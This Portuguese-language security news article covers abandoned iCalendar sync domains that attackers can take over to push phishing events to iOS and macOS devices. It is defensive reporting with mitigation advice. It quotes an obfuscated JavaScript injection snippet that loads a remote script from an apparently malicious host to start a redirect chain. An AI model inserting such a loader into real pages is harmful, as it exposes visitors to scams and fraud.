Analistas identificaram uma rede de domínios iCalendar abandonados que continua a receber sincronizações de dispositivos e pode permitir que atacantes repliquem calendários legítimos para distribuir links maliciosos e scripts sem interação do usuário.
Descoberta e panorama
Relatório divulgado e citado por uma publicação técnica aponta que mais de 390 domínios usados para sincronização de calendários foram abandonados e, após expiração, passaram a receber tráfego de reconexão. A investigação associou essas entradas a cerca de 4 milhões de endereços IP únicos por dia, com foco em dispositivos iOS e macOS.
Abordagem técnica — vetores observados
Os analistas descreveram padrões de tráfego que permitem identificar solicitações de sincronização automatizadas. Exemplos coletados mostram requisições HTTP com cabeçalho Accept indicando suporte a arquivos de calendário (text/calendar) e User-Agent de processos de sistema de calendário, confirmando que o tráfego é gerado pelo daemon de sincronização e não por navegação manual.
GET /[URI]
Host: [Target_Domain]
User-Agent: iOS/17.5.1 (21F90) dataaccessd/1.0
Accept: text/calendar
Os pesquisadores classificaram o tráfego malicioso em duas categorias principais: URIs codificadas em Base64 e consultas webcal que retornam arquivos .ics manipulados. Em muitos casos o servidor retornava um arquivo iCalendar contendo eventos com payloads ou links que, quando exibidos na interface do calendário, servem como vetor de phishing ou redirecionamento para conteúdo malicioso.
Uso de JavaScript ofuscado
Além dos eventos manipulados, parte da infraestrutura relatada injeta scripts ofuscados que iniciam cadeias de redirecionamento. Um trecho simples extraído pelo relatório ilustra a técnica de injeção dinâmica que carrega um recurso externo para a página:
_0x407c32.src = "https://render.linetowaystrue.com/jRQxhz";
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(_0x407c32, document.currentScript);
}
Segundo os analistas, a deobfuscação desses scripts revela mecanismos para carregar conteúdo adicional que pode levar a golpes e campanhas de fraude, ampliando o risco além do simples envio de um link malicioso no evento do calendário.
Impacto e alcance
Os números mencionados no relatório — mais de 390 domínios e aproximados 4 milhões de IPs distintos diários — indicam escala significativa, sobretudo porque a exploração não exige ação adicional do usuário depois que a assinatura do calendário está ativa. O ambiente mais afetado, conforme os dados, é o ecossistema Apple (iOS/macOS), onde o daemon de sincronização realiza requisições periódicas em segundo plano.
Limites das informações
O material consultado relata os indicadores e padrões observados, mas não apresenta atribuições de ameaça específicas ou contagens detalhadas por país/organização. As fontes não detalham se houve campanhas de comprometimento que levaram à instalação de malware persistente em dispositivos finais; relatam, isso sim, a capacidade de entregar phishing, scareware e redirecionamentos via eventos e scripts.
Mitigações e recomendações
Conforme indicado pelos próprios analistas, equipes de segurança podem reduzir a superfície de risco ao observar assinaturas de tráfego (por exemplo, Accept: text/calendar combinado com User-Agent de daemons de sincronização) e ao bloquear domínios identificados como expirados ou suspeitos. Também são medidas apropriadas a revisão de assinaturas de calendário em dispositivos gerenciados e a remoção manual de assinaturas desconhecidas por parte dos usuários.
O relatório ressalta que a ameaça explora a confiança implícita em ferramentas de produtividade: assinaturas continuam a sincronizar mesmo quando o domínio original deixou de ser administrado, permitindo que um novo proprietário do domínio direcione a sincronização para conteúdos maliciosos.
Relevância para operações e conformidade
Além do risco direto a usuários finais, organizações que permitem dispositivos pessoais em ambiente corporativo (BYOD) devem considerar controles adicionais para assinaturas externas de calendário e monitoramento de tráfego de sincronização. Do ponto de vista regulatório, incidentes que resultem em vazamento de dados pessoais via phishing ou fraude podem ter implicações sob leis de proteção de dados; as fontes não especificam casos relacionados à LGPD.
O que acompanhar
As equipes de resposta devem acompanhar listas de domínios expirados observados em feeds de inteligência, correlacionar solicitações com User-Agent e cabeçalhos de Accept e orientar usuários sobre como listar e remover assinaturas de calendário desconhecidas em iOS e macOS. As fontes sugerem que a identificação das assinaturas e o bloqueio de domínios suspeitos são as ações imediatas mais eficazes.